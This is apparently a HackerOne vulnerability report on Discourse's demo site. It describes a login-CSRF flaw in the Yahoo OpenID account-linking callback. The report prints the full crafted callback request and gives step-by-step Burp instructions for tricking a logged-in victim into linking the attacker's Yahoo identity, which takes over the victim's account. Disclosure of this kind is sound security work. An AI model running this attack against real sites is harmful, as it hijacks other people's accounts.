Discourse: Account takeover at https://try.discourse.org due to no CSRF protection in connecting Yahoo account

2018-10-12T16:57:57
ID H1:423022
Type hackerone
Reporter avinash_
Modified 2018-12-06T02:35:56

Description

Hi

There is an option in https://try.discourse.org/u/testh1ay/preferences/account to connect our Yahoo account.

I noticed Connect Yahoo account option have the workflow with GET method and there is lack of csrf protection on connecting yahoo account which can help attacker into inducing victim to connect attacker's yahoo account to victim's discourse account, and it leads to full account takeover of victim's account.

Vulnerable Request:

GET /auth/yahoo/callback?_method=post&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.mode=id_res&openid.return_to=https%3A%2F%2Ftry.discourse.org%2Fauth%2Fyahoo%2Fcallback%3F_method%3Dpost&openid.claimed_id=https%3A%2F%2Fme.yahoo.com%2Fa%2F7qAAT.abcd&openid.identity=https%3A%2F%2Fme.yahoo.com%2Fa%2F7qAAT.abcd&openid.realm=https%3A%2F%2Ftry.discourse.org&openid.ns.ax=http%3A%2F%2Fopenid.net%2Fsrv%2Fax%2F1.0&openid.ax.mode=fetch_response&openid.ax.value.email=testhackeroneay%40yahoo.com&openid.ax.value.fullname=test%20hackerone&openid.ax.value.nickname=test&openid.assoc_handle=abcd&openid.response_nonce=2018-10-12T16%3A27%defg-&openid.signed=assoc_handle%2Cclaimed_id%2Cidentity%2Cmode%2Cns%2Cop_endpoint%2Cresponse_nonce%2Creturn_to%2Csigned%2Cax.value.email%2Cax.type.email%2Cax.value.fullname%2Cax.type.fullname%2Cax.value.nickname%2Cax.type.nickname%2Cns.ax%2Cax.mode%2Cpape.auth_level.nist&openid.op_endpoint=https%3A%2F%2Fopen.login.yahooapis.com%2Fopenid%2Fop%2Fauth&openid.ax.type.email=http%3A%2F%2Faxschema.org%2Fcontact%2Femail&openid.ax.type.fullname=http%3A%2F%2Faxschema.org%2FnamePerson&openid.ax.type.nickname=http%3A%2F%2Faxschema.org%2FnamePerson%2Ffriendly&openid.pape.auth_level.nist=0&openid.sig=9p%2Bxyz HTTP/1.1 Host: try.discourse.org User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0

Steps to reproduce:

  1. Attacker go to https://try.discourse.org/u/user/preferences/account
  2. Switch on burp interceptor and click on Yahoo connect.
  3. Go to burp interceptor and after forwarding some requests attacker will find the upper mentioned vulnerable request.
  4. Copy that and drop the request( here you saved the auth token generated by yahoo).
  5. Now feed the copied request to authenticated victim (as a html form or as an url).
  6. Victim get the message authentication complete and get redirected to https://try.discourse.org/?authComplete=true.
  7. Attacker open his browser and try to login with yahoo.
  8. Attacker get redirected to https://try.discourse.org/auth/yahoo/null
  9. Attacker open https://try.discourse.org
  10. Check Victim's account successfully compromised.

Impact

Account Takeover.